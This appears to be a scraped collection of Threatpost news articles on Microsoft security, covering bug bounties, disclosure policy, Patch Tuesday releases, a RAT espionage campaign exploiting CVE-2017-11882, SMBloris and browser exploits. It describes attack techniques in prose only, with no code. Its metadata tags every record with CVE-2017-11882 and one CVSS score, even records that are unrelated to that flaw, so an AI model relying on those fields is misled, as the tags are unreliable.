Many of these vendors and individuals first came to our attention based on the high-quality and unique approaches demonstrated by the vulnerabilities they reported to the MSRC.\u201d\n\nSome researchers have been calling on large software vendors such as Microsoft, Adobe, Apple and others to pay for the bugs that outsiders find in their products, but so far none of these companies has shown any indication that they\u2019re willing to do so. Third-party vulnerability buyers such as TippingPoint\u2019s Zero Day Initiative and iDefense Labs pay varying amounts for vulnerabilities, depending upon the severity of the bug. And there is also an unknown number of bugs sold to government agencies, defense contractors and other buyers in private sales every year.\n\nMozilla last week said it was [raising its bug bounty to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>), and Google made a similar move four days later,[ jacking its top price up to $3,133.7](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\nMicrosoft has been using outside researchers to test their software for security flaws on a contract and one-off basis for years now. But much of that work goes to boutique consultancies and not to individual researchers who find the bugs on their own time. That\u2019s one of the reasons that [some researchers have been encouraging their peers to stop reporting vulnerabilities](<https://threatpost.com/no-more-free-bugs-software-vendors-032309/>) to vendors who don\u2019t pay bug bounties. 
The reasoning being that the vendors have their own in-house testers and consultants, who are getting paid, so there\u2019s nothing in it for outside researchers, aside from an acknowledgement from the vendor.\n", "cvss3": {}, "published": "2010-07-22T20:54:11", "type": "threatpost", "title": "Microsoft Says No to Paying Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:29", "id": "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "href": "https://threatpost.com/microsoft-says-no-paying-bug-bounties-072210/74249/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:22", "description": "Microsoft is changing the way in which it handles vulnerability disclosures, now moving to a model it calls coordinated vulnerability disclosure, in which the researcher and the vendor work together to verify a vulnerability and allow ample time for a patch. However, the new philosophy also recognizes that if there are attacks already happening, it may be necessary to release details of the flaw even before a patch is ready.\n\nThe shift is a subtle one from Microsoft, which has always been at the heart of the debate over full disclosure of security vulnerabilities. The company has been very vocal in the past about its assertion that all vulnerabilities in its products should be reported privately to the company and the researcher should then give Microsoft some undisclosed amount of time to come up with a fix. The new CVD strategy still doesn\u2019t lay out a timeline for patch releases, but it represents a public change in the way the company is thinking.\n\nThe new CVD strategy relies on researchers to report vulnerabilities either directly to a vendor or to a trusted third party, such as a CERT-CC, who will then report it to the vendor. 
The finder and the vendor would then try to agree on a disclosure timeline and work from there. \n\n\u201cNewly discovered vulnerabilities in hardware, software, and services are disclosed directly to the vendors of the affected product, to a CERT-CC or other coordinator who will report to the vendor privately, or to a private service that will likewise report to the vendor privately. The finder allows the vendor an opportunity to diagnose and offer fully tested updates, workarounds, or other corrective measures before detailed vulnerability or exploit information is shared publicly. If attacks are underway in the wild, earlier public vulnerability details disclosure can occur with both the finder and vendor working together as closely as possible to provide consistent messaging and guidance to customers to protect themselves,\u201d said Matt Thomlinson, general manager of Microsoft\u2019s Trustworthy Computing group. \n\n\u201cCVD does not represent a huge departure from the current definition of \u2018responsible disclosure,\u2019 and we would still view vulnerability details being released broadly outside these guidelines as putting customers at unnecessary levels of risk. However, CVD does allow for more focused coordination on how issues are addressed publicly. CVD\u2019s core principles are simple: vendors and finders need to work closely toward a resolution; extensive efforts should be made to make a timely response; and only in the event of active attacks is public disclosure, focused on mitigations and workarounds, likely the best course of action \u2014 and even then it should be coordinated as closely as possible.\u201d\n\nThe change from Microsoft comes close on the heels of several other major shifts in the landscape recently, including the decisions by both Google and Mozilla to raise their bounties for security bugs to $3,133.7 and $3,000, respectively. 
Microsoft has steadfastly refused to pay bug bounties in the past, though there are persistent rumors that the company may do so at some point in the near future. \n\nThe CVD plan closely resembles other disclosure strategies that have been released over the years, and incorporates some elements of plans that researchers have suggested. The use of trusted third parties, such as the CERT-CC, is something that has been suggested by a number of people in the past, and has the advantage of including a dispassionate organization that can work with both the researcher and the vendor when conflicts arise or if the vendor is unresponsive. \n\nThe new CVD policy, in fact, incorporates some of the elements that were laid out in a [plan written by the defunct Organization for Internet Safety in 2004](<http://www.symantec.com/security/OIS_Guidelines%20for%20responsible%20disclosure.pdf>), particularly the usage of third parties to help moderate the process.\n\nThe key concession in the new CVD strategy is the acknowledgement that there are times when it may be necessary for the researcher to disclose details of a given vulnerability before a patch is ready. This often is done if a vendor is not responsive to the researcher or if the researcher doesn\u2019t think the vendor is making a good faith effort to fix a flaw quickly enough. However, as Microsoft says in its policy, disclosure of flaw details may be necessary in cases where attacks against the vulnerability are already underway in the wild and security staffs need information on the problem to help protect their networks. 
\n\nKatie Moussouris, a senior security strategist at Microsoft, said in a [related blog post](<http://blogs.technet.com/b/ecostrat/archive/2010/07/22/coordinated-vulnerability-disclosure-bringing-balance-to-the-force.aspx>) that the company needs help from the research community to make this CVD philosophy work.\n\n\u201cResponsible Disclosure should be deprecated in favor of something focused on getting the job done, which is to improve security and to protect users and systems. As such, Microsoft is asking researchers to work with us under Coordinated Vulnerability Disclosure, and added some coordinated public disclosure possibilities before a vendor-supplied patch is available when active attacks are underway. It uses the trigger of attacks in the wild to switch modes, which is an event that is objectively observable by many independent sources,\u201d she wrote. \u201cMake no mistake about it, CVD is basically founded on the initial premise of Responsible Disclosure, but with a coordinated public disclosure strategy if attacks begin in the wild. That said, what\u2019s critical in the reframing is the heightened role coordination and shared responsibility play in the nature and accepted practice of vulnerability disclosure. 
This is imperative to understand amidst a changing threat landscape, where we all accept that no longer can one individual, company or technology solve the online crime challenge.”

Source article: [Microsoft Shifts to 'Coordinated Vulnerability Disclosure' Policy](<https://threatpost.com/microsoft-shifts-coordinated-vulnerability-disclosure-policy-072210/74247/>), Threatpost, published 2010-07-22.

The Microsoft Patch Tuesday train rolled into town today, dropping off a massive 10 security bulletins with fixes for at least 34 documented vulnerabilities.

Three of the bulletins are rated “critical” because of the risk of remote code execution attacks.
Affected products include the Windows operating system, Microsoft Office, the Internet Explorer browser and Internet Information Services (IIS).

This month’s patch batch also provides cover for a known cross-site scripting flaw in the Microsoft SharePoint Server and a publicly discussed data leakage hole in Internet Explorer.

Microsoft is urging its users to pay special attention to [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) (Windows), [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) (ActiveX killbits) and [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) (Internet Explorer) because these contain fixes for issues that may be exploited by malicious hackers very soon.

Here’s the skinny on these three bulletins:

 * [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) — This security update resolves two privately reported vulnerabilities in Microsoft Windows. These vulnerabilities could allow remote code execution if a user opens a specially crafted media file or receives specially crafted streaming content from a Web site or any application that delivers Web content.
This is rated Critical for Quartz.dll (DirectShow) on Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008; Critical for Windows Media Format Runtime on Microsoft Windows 2000, Windows XP, and Windows Server 2003; Critical for Asycfilt.dll (COM component) on Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2; and Important for Windows Media Encoder 9 x86 and x64 on Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008.
 * [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) — This security update addresses two privately reported vulnerabilities for Microsoft software. This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Vista, and Windows 7, and Moderate for all supported editions of Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2. The vulnerabilities could allow remote code execution if a user views a specially crafted Web page that instantiates a specific ActiveX control with Internet Explorer. It also includes kill bits for four third-party ActiveX controls.
 * [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) — Fixes five privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer.
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update is rated Critical for Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4; Critical for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows clients; and Moderate for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows servers.

Qualys CTO Wolfgang Kandek noticed that four of the 10 bulletins address zero-day issues, the most significant being MS10-035, which fixes the zero-day published by Core Security for an information disclosure vulnerability originally published in February 2010. It also fixes the PWN2OWN vulnerability that security researcher Peter Vreugdenhil used to win ZDI’s competition at CANSECWEST. During that contest, Vreugdenhil bypassed all built-in protections such as DEP and ASLR by combining multiple attack methods.

The MS10-040 bulletin is also interesting. It covers a remotely exploitable vulnerability in all versions of IIS, but it is present only if the administrator has downloaded and installed the Channel Binding Update and enabled Windows Authentication. It further requires an account on the system, reducing the number of vulnerable hosts to a small subset.
Microsoft rates this an “important” update.

Source article: [Patch Tuesday: Microsoft Kills Pwn2Own Browser Bug](<https://threatpost.com/patch-tuesday-microsoft-kills-pwn2own-browser-bug-060810/74077/>), Threatpost, published 2010-06-08.

Microsoft today announced plans to share pre-patch details on software vulnerabilities with governments around the world under a new program aimed at securing critical infrastructure and government assets from hacker attacks.

The program, codenamed Omega, features a Defensive Information Sharing Program (DISP) that will offer government entities at the national level technical information on vulnerabilities that are being updated in Microsoft’s products.

Microsoft’s Steve Adegbite [explains](<http://blogs.technet.com/ecostrat/archive/2010/05/17/strengthening-the-security-cooperation-program.aspx>):

_We will provide this information after our investigative and remediation cycle is completed to ensure that DISP members are receiving the most current information.
While this process varies from issue to issue due to the complex nature of vulnerabilities, disclosure will happen just prior to our security update release cycles._

The company also announced a second information sharing program called the Critical Infrastructure Partner Program (CIPP) that aims to “provide valuable insights on security policy, including strategies, approaches to help aid the protection efforts for critical infrastructures,” according to Adegbite.

Source article: [Microsoft to Share Vulnerability Details with Governments](<https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/73986/>), Threatpost, published 2010-05-18.

A series of espionage attacks has been uncovered, targeted at service centers in Russia that provide maintenance and support for a variety of electronic goods.

The payload is a commercial version of the [Imminent Monitor](<https://imminentmethods.net/features/>) tool, which is freely available for purchase as legitimate software.
Its developers explicitly prohibit any usage of the tool in a malicious way – which bad actors are clearly ignoring.

Imminent Monitor includes two modules for recording video from a victim’s webcam, along with three others that contain different spy and control functionalities, such as looking at file contents on the victim’s machine.

**A Long and Winding Kill Chain**

FortiGuard Labs said that the multi-stage attacks use a whole bag of tricks to carry out their dirty work, including spoofed emails, malicious Office documents and a variety of unpacking techniques for Imminent Monitor, which functions as a remote access trojan (RAT).

The kill chain starts, as many attacks do, with fraudulent emails. In this case, they purport to be from Korean consumer electronics giant Samsung. FortiGuard researchers said that the nature of the mails suggests a targeted attack, not just a “spray-and-pray” random spam campaign.

“The email was specifically sent to the service company that repairs Samsung’s electronic devices,” the firm said in [an analysis](<https://www.fortinet.com/blog/threat-research/non-russion-matryoshka-russian-service-centers-under-attack.html>) on Thursday, adding that the emails contain Excel files with the same naming convention that the targeted company uses in legitimate transactions.

Further, the spreadsheet files, which may have been lifted from a legitimate source, have been weaponized with an exploit for a vulnerability, CVE-2017-11882, in a 17-year-old piece of software.

“The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years,” the team said. “It is simply not that easy to trick a user into opening an executable file as it was before.
Exploits are a different case.”

Interestingly, the vulnerability exists in an Office component called the Equation Editor (eqnedt32.exe), which allows users to insert mathematical and scientific equations into documents. It was kept around for compatibility reasons despite being flawed. Last year, Microsoft [manually patched](<https://blog.0patch.com/2017/11/did-microsoft-just-manually-patch-their.html>) a buffer overflow bug in it — the flaw used in these campaigns.

Rumors have gone around that choosing to patch the binary file rather than fixing the code itself suggests Microsoft lost the source code of the flawed feature, FortiGuard pointed out.

“The malware authors clearly love this vulnerability because it allows them to achieve a stable exploitation across all current Windows platforms,” the researchers said.

From there, the exploit’s shellcode takes a look at the export directory of the kernel32.dll on the targeted machine and locates the addresses of two key functions: LoadLibraryA and GetProcAddress. These are then used to obtain the addresses of the other necessary functions for the attack, including an important capability to determine the exact landing location for the payload, since this will vary according to platform.

Finally, the shellcode downloads the Imminent Monitor payload and then tries to execute it: The RAT is tucked into five different protective layers, including the ConfuserEx packer, which obfuscates object names, as well as names of methods and resources, to make it hard to read and be understood by humans.
ConfuserEx actually shows up twice; the second time, it includes a Rick-Rolling attempt.

Another packer used is the BootstrapCS executable, which performs anti-analysis checks; and eventually, for the final unpacking procedure of the RAT itself, the file uses the legit “lzma.dll” library from 7Zip.

**Not Their First Rodeo**

Even though the emails are written in Russian, the attacks are coming from outside the country, carried out by a group known for other campaigns.

The analysts said that it’s “highly unlikely” that a native Russian speaker wrote the email text; rather, it seems to have been run through a translator. Also, even though the “from” address appears to be Russian in origin, an examination of the headers revealed that the IP address of the sender isn’t related to the email address’ domain.

Also, in analyzing the C2 servers used in the attacks, FortiGuard found, based on the registrant data, that 50 domains were all registered on the same day.

“Some of these domains have already been used for malware spreading,” the firm said. “Another group was linked to the phishing campaigns.”

FortiGuard also searched its collection of samples and found several spreadsheet samples that use the same C2 servers as the samples from these attacks.

“The samples are older and use different vulnerabilities,” the researchers said.
“We believe that this same group of attackers are behind both groups of samples.”

While it’s unclear who exactly is behind the attacks, it’s clear that this campaign is not the first – and will probably not be the last – for the bad actors.

Source article: [Targeted Spy Campaign Hits Russian Service Centers](<https://threatpost.com/targeted-spy-campaign-hits-russian-service-centers/132639/>), Threatpost, published 2018-06-07.

LAS VEGAS—A 20-year-old Windows SMB vulnerability is expected to be disclosed Saturday during a talk at DEF CON.

Microsoft has said it will not patch the vulnerability, which allows an attacker to remotely crash a Windows server with relative ease using only 20 lines of Python code and a Raspberry Pi.

The vulnerability affects every version of the SMB protocol and every Windows version dating back to Windows 2000. It was likely introduced into the operating system much earlier, said Sean Dillon, senior security researcher at RiskSense. Dillon, who conducted his research with colleague Zach Harding, called the attack SMBloris because it is comparable to [Slowloris](<https://threatpost.com/mitigating-slowloris-http-dos-attack-062209/72845/>), a 2009 attack developed by [Robert Hansen](<http://ha.ckers.org/blog/20090617/slowloris-http-dos/>).
Both attacks can use a single machine to crash or freeze a much more powerful server, but Slowloris, unlike SMBloris, targets webservers.

“Similar to Slowloris, it requires opening many connections to the server, but these are low-cost connections for the attacker, so a single machine is able to perform the attack,” Dillon said.

Dillon was among the first researchers to analyze EternalBlue, the leaked NSA SMB exploit that was used to spread the WannaCry ransomware attack and ExPetr wiper malware. It was during that analysis that Dillon uncovered this issue.

“While working on EternalBlue, we observed a pattern in the way memory allocations were done on the non-paged pool of the Windows kernel. The non-paged pool is memory that has to be reserved in physical RAM; it can’t be swapped out,” Dillon explained. “That’s the most precious pool of memory on the system. We figured out how to exhaust that pool, even on servers that are very beefy, even 128 GB of memory. We can take that down with a Raspberry Pi.”

The issue was privately reported to Microsoft in early June as the EternalBlue analysis was completed, Dillon said. Microsoft told the researchers that two internal security teams concluded the vulnerability was a moderate issue and would not be moved into the security branch, and likely never fixed. Saturday’s DEF CON talk will be 60 days after the initial report was sent to Microsoft and 45 days after Microsoft’s response was relayed.

“The case offers no serious security implications and we do not plan to address it with a security update,” a Microsoft spokesperson told Threatpost.
“For enterprise customers who may be concerned, we recommend they consider blocking access from the internet to SMBv1.”

“The reason they say it’s a moderate issue is because it does require opening many connections to the server, but you could do it all from a single machine, and a Raspberry Pi could take down the beefiest server,” Dillon said.

The vulnerability lies in the way SMB packets are processed and memory is allocated. Dillon and Harding said they found a way to take advantage of that allocation system to crash a server.

“It will amplify already existing attacks like DDoS attacks,” Dillon said. “Why DDoS when you can DoS from a single machine. You don’t need a botnet to take down a Windows server.”

The attack is able to allocate all memory a server has available, to the point where it won’t even blue screen, Dillon said. The operating system crashes as it looks through long memory lists looking for unallocated memory, causing the CPU to spike.

“You get critical services to crash and you can completely freeze the system,” Dillon said. “There are also lots of integrity issues because when you have all the non-paged pool memory allocated already, certain disk writes, even logging can’t take place because there’s no memory. One of the problems we’ve run into is that we’ve completely exhausted the system and caused it to freeze; one of the reasons it doesn’t blue-screen is because it doesn’t have enough resources needed to blue-screen.
It will freeze and never come back.”

Dillon said he and Harding will share some additional technical details during their talk and will demo the attack.

“It’s such a simple attack really; I think a lot of the people there will be able to catch on to what’s happening,” Dillon said.

As for a fix, Dillon believes it wouldn’t be a simple task for Microsoft.

“I think that’s the problem is that it’s not the easiest fix; it’s the way they’ve done SMB memory allocation for over 20 years. So everything relies on the fact the client says ‘I have a buffer that I’m sending that’s this big.’ The server reserves that much memory so it can handle it,” Dillon said. “What we did we say I have a huge buffer and never send the buffer. There’s still a lot of components that rely on the fact that buffer is already allocated and the size is already known.”

Dillon said a mitigation can be applied through inline devices including firewalls by limiting the number of active connections from a single IP address to SMB ports.

Ironically, the only reason Dillon and Harding found the bug was because this allocation behavior is critical to the pool grooming used in EternalBlue.

“You have to have those allocations happen,” Dillon said.
“So actually, if this behavior was not the way it was, the pool grooming in EternalBlue would not be the same and the exploit might not work at all.”

Source article: [Windows SMB Zero Day to Be Disclosed During DEF CON](<https://threatpost.com/windows-smb-zero-day-to-be-disclosed-during-def-con/126927/>), Threatpost, published 2017-07-26.

For a long time, Microsoft’s monthly Patch Tuesday security bulletins have periodically addressed use-after-free vulnerabilities, the latest class of memory corruption bugs that have already found their way into a number of targeted attacks.

Microsoft has implemented mitigations to address memory related vulnerabilities that afford successful attackers control over the underlying computer. Most notably, Microsoft has stood behind its Enhanced Mitigation Experience Toolkit, or EMET, suggesting it on several occasions as a temporary mitigation for a vulnerability until the company could push out a patch to users.

Most recently, Microsoft brought new memory defenses to the browser, loading Internet Explorer with two new protections called Heap Isolation and Delayed Free, both of which take steps inside IE to frustrate and deny the execution of malicious code.

Researchers have had a growing interest in [bypassing EMET and memory protections](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) for some time, with some [successful bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) disclosed and ultimately addressed by Microsoft.
And until the [Operation Snowman attacks](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), they were exclusively the realm of white hats—as far as we know publicly.

As with the [EMET protections](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>), Heap Isolation and Delayed Free were bound to attract some attention, and last week at ShmooCon, a hacker conference in Washington, D.C., Bromium Labs principal security researcher Jared DeMott successfully demonstrated a bypass for both.

DeMott’s bypass relies on what he termed a weakness in Microsoft’s approach with the new protections. With Heap Isolation, a new heap is created housing sensitive internal IE objects, while objects such as JavaScript likely to be targeted remain in the default heap, he said.

“Thus if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data,” he wrote in a [report](<http://labs.bromium.com/2015/01/17/use-after-free-new-protections-and-how-to-defeat-them/>) published this week. This separation of good and bad data, however, isn’t realistic given the complexity of code and objects.
Delayed Free then kicks in by delaying the release of an object to memory until there are no references to the object on the stack and 100,000 bytes are waiting to be freed, DeMott said.

Taking advantage of these conditions, DeMott’s bypass works through the use of what he calls a “long-lived dangling pointer.”

“If an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds),” DeMott said. “And finding useful objects in either playground to replace the original turns out not to be that difficult either.”

[DeMott’s bypass is a Python script](<https://bromiumlabs.files.wordpress.com/2015/01/allocationinformation-py.zip>) which searches IE for all objects, sizes and whether an object is allocated to the default or isolated heap.

“This information can be used to help locate useful objects to attack either heap,” he wrote. “And with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object.”

DeMott said an attack would be similar to other client-side attacks. A victim would have to be lured to a website via phishing or a watering hole attack and be infected with the exploit.

“If you have a working UaF bug, you have to make sure it’s of this long-lived type and can basically upgrade it to an existing attack to bypass these mitigations,” DeMott told Threatpost.
“There’s no secret sauce, like every attack, it just depends on a good bug.”

DeMott said he expects use-after-free to be the next iteration of memory corruption attacks.

“There’s always a need [for attackers] to innovate,” DeMott said, pointing out that Microsoft deployed ASLR and DEP in response to years of buffer overflow and heap spray attacks, only to be thwarted by attackers with use-after-free vulnerabilities. “It’s starting to happen, it’s coming if it’s not already here.”

Source article: [Bypass Demonstrated for Microsoft Use-After-Free Mitigation in IE](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), Threatpost, published 2015-01-21.

Microsoft made patch news on two fronts last month with an unusual [emergency patch for a critical vulnerability in Kerberos](<http://threatpost.com/microsoft-to-release-critical-out-of-band-windows-patch/109433>), and for a missing fix for an Exchange bug that was promised in its November advance notification.

In the [December advance notification](<https://technet.microsoft.com/library/security/ms14-dec>), released today, an elevation of privilege bug in Exchange is listed among seven scheduled bulletins to be pushed out next Tuesday. The Exchange patch is rated important, one of four bulletins so rated by Microsoft; the remaining three are rated critical, meaning the likelihood of remote code execution and imminent exploit is high.

Expect the Exchange patch to be MS14-075.
The patch applies to Microsoft Exchange Server 2007 SP3, Exchange Server 2010 SP3, Exchange Server 2013 SP1 and Exchange Server 2013 Cumulative Update 6. No further details were made available by Microsoft.

The three critical bulletins expected next week are topped off by another Internet Explorer rollup. The IE vulnerabilities addressed are rated moderate for IE 6, IE 7 and IE 8 running on Windows Server 2003 and Windows Server 2008. They are rated critical for remote code execution on Vista, Windows 7, Windows 8 and 8.1 for IE 7 and up.

Another critical remote code execution bulletin is expected in Office software starting with Microsoft Word 2007 SP 3, as well as Microsoft Office 2010 SP 2, Word 2010 SP 2, Word 2013 and Word 2013 RT. Microsoft Office for Mac 2011 is also vulnerable, as is Microsoft Word Viewer and Microsoft Office Compatibility Pack. Microsoft SharePoint Server 2010, 2013, and Microsoft Office Web Apps 2010 and 2013 are also covered by this bulletin, but those vulnerabilities are rated important.

Two other bulletins patch remote code execution vulnerabilities in Office, but are rated important, meaning there is some mitigating circumstance; for example, an attacker would need local access or legitimate credentials to exploit the flaw.

“With the balance of next week’s bulletins impacting Windows, December will be a month for IT to focus on the desktop,” said Russ Ernst of Lumension.

The final critical bulletin covers remote code execution vulnerabilities in Windows Vista. The flaw is rated important for all other Windows Server versions. Windows Server 2003 users, meanwhile, are on notice that support runs out for the platform July 14, 2015.

As the year winds down, the number of critical bulletins is down. Microsoft is on track for 29 critical bulletins this year, compared to 42 last year, and 35 the year before.
IT shops will have 83 bulletins to contend with this year, down from 105 in 2013, Lumension said.

Source article: [December 2014 Microsoft Patch Tuesday Advance Notification](<https://threatpost.com/missing-exchange-patch-expected-among-december-patch-tuesday-bulletins/109722/>), Threatpost, published 2014-12-04.

The same team from VUPEN that took down Google Chrome on Wednesday has succeeded in compromising Internet Explorer 9 on Windows 7, using two separate bugs. The success at the Pwn2Own contest was the result of a heap overflow bug in IE as well as a separate bug in the browser’s protected mode.

The heap overflow vulnerability exists in many versions of IE, from version 6 through IE 10, which is in consumer preview right now. Chaouki Bekrar of VUPEN said that the compromise of IE was quite challenging and that it took two of his team members about six weeks of work to find the bugs and make the exploits work.

The bug that enabled the team to break out of IE’s protected mode – which is analogous to the sandbox in Google Chrome – is a memory corruption flaw in protected mode itself. As part of the Pwn2Own contest rules, VUPEN will turn over the heap overflow details to TippingPoint, which runs the contest, and they will then pass the information on to Microsoft.
The protected mode bypass, however, will stay in VUPEN’s hands.

The VUPEN team has a large lead in the Pwn2Own contest, after compromising Chrome and IE, as well as writing exploits for several of the public vulnerabilities that TippingPoint handed out at the beginning of the competition. However, another team comprising two former winners, Vincenzo Iozzo and Willem Pinckaers, also has entered the contest. Still, Bekrar said his team didn’t necessarily need to use the IE bugs.

“We dropped it because we could,” he said.

The heap overflow bug that VUPEN used to compromise IE enabled the team to get into the browser’s low-integrity area, and then they used the memory-corruption flaw in protected mode to get into the high-integrity area.

“The Chrome sandbox is much harder to escape for us, because we have the bug in protected mode,” Bekrar said.

The IE bugs enabled the team to bypass ASLR and DEP on Windows, and although the bug also works on IE 10 on Windows 8, Bekrar said that from what he’s seen of the forthcoming version of the browser, it will be more difficult to exploit.

“IE 10 is more complicated to exploit because they’ve added some protections to make it harder to use memory leaks and use-after-free bugs,” he said.
\u201cI think that will make the prizes [in Pwn2Own] go higher.\u201d\n", "cvss3": {}, "published": "2012-03-08T22:56:42", "type": "threatpost", "title": "IE 9 Falls to Pair of Zero Days at Pwn2Own", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:39", "id": "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "href": "https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/76310/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:46", "description": "Microsoft announced today that it plans on shipping seven bulletins, five critical, two important, for the [December edition](<http://technet.microsoft.com/en-us/security/bulletin/ms12-dec>) of its monthly patch Tuesday security bulletin release cycle.\n\nThe year\u2019s last scheduled batch of patches will address 11 vulnerabilities in all currently supported operating systems, including Microsoft Windows, Internet Explorer (IE 6-10), Office and the company\u2019s Server Software.\n\nIf left unpatched, six of the seven bulletins could lead to remote code execution while the last could allow a hacker to bypass one of Windows\u2019 security features.\n\nQualys\u2019 Wolfgang Kandek notes on the company\u2019s [Laws of Vulnerabilities blog](<http://laws.qualys.com/2012/12/december-2012-patch-tuesday-pr.html>) that the third bulletin, rated critical, affects Microsoft Word, suggesting the vulnerability may leverage Outlook to display documents without the users\u2019 interaction.\n\nThe bulletin summaries will be released in their entirety next Tuesday, December 11 and per usual, the company is set to host a [Technnet webcast](<https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032522564&Culture=en-US>) discussing the vulnerabilities and patch management practices the following day, December 12 at 11 a.m.\n", "cvss3": {}, "published": "2012-12-06T19:07:50", "type": 
"threatpost", "title": "Microsoft Fixing 11 Vulnerabilities for December Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:07", "id": "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "href": "https://threatpost.com/microsoft-fixing-11-vulnerabilities-december-patch-tuesday-120612/77289/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:19", "description": "Estimates of the extent of cyber crime are hopelessly overblown, two computer security researchers argue in an [editorial from Sunday\u2019s New York Times](<http://www.nytimes.com/2012/04/15/opinion/sunday/the-cybercrime-wave-that-wasnt.html>).\n\nArguing counter to the prevailing opinion that online crime is a modern day Yukon Gold Rush for entrepreneurial hackers, the two Microsoft researchers say that evidence suggests that only a sliver of the world\u2019s cyber crooks get rich from their illegal activity, while most struggle to make it. \n\n\u201cIf getting rich were as simple as downloading and running software, wouldn\u2019t more people do it?\u201d researchers Dinei Flor\u00eancio and Cormac Herley ask in their Times editorial, \u201cThe Cybercrime Wave That Wasn\u2019t.\u201d\n\nThe editorial synthesizes the findings of a raft of research from Herley and his colleagues that cast doubt on the estimates of the size of the cyber underground \u2013 many of which were funded by private security firms with an interest in making cyber crime appear to be a large and pressing problem.\n\nThe two studied surveys of cyber crime affecting consumers and companies. They conclude that estimates of the extent of cyber crime make a number of common errors in trying to extrapolate the extent of global cyber criminal activity. Surveys, for example, mistakenly ratchet up the numbers when they try to scale small survey groups to the overall population. 
The two also single out the adverse effect \u2018unverified outliers\u2019 can have on data. In their research, 90 percent of estimates are skewed by input from one or two individuals. \u201cUpward bias\u201d \u2013 a tendency of overstating a general phenomenon based on statistical evidence \u2013 permeated all of the surveys the two looked over, according to the piece.\n\nThe editorial draws from a paper issued by Herley and Flor\u00eancio; \u201cSex, Lies and Cyber-crime Surveys\u201d in which the two researchers [reasoned that cyber crime surveys](<https://threatpost.com/microsoft-research-cybercrime-surveys-are-useless-062111/>) are \u201cso compromised and biased that no faith whatever can be placed in their findings.\u201d When the research was published the duo called their assessment harsh but insisted that when it comes to security research, unreliable data is just masquerading as reliable data.\n\nThe thoughts also echo some that Herley, a principal researcher at Microsoft, has expressed before. In 2009, Herley challenged the concept that the underground cyber crime community\u2019s size and vitality are forces to be reckoned with.\n\nIn a June 2009 [podcast with Threatpost editor Dennis Fisher](<https://threatpost.com/cormac-herley-underground-economy-irc-economics-and-externalities-cybercrime-061209/>) still applicable today, Herley rationalized that it\u2019s hard to get an accurate reading on some security metrics and that the value of the underground economy was being oversold.\n\nIn a recent publication for IEEE Security And Privacy Magazine, Herley [took a similar, contrarian stance against popular coverage of banking fraud](<https://threatpost.com/money-mules-not-customers-real-victims-bank-fraud-032712/>), noting that money mules, not the account holders were the most victimized by online bank heists. 
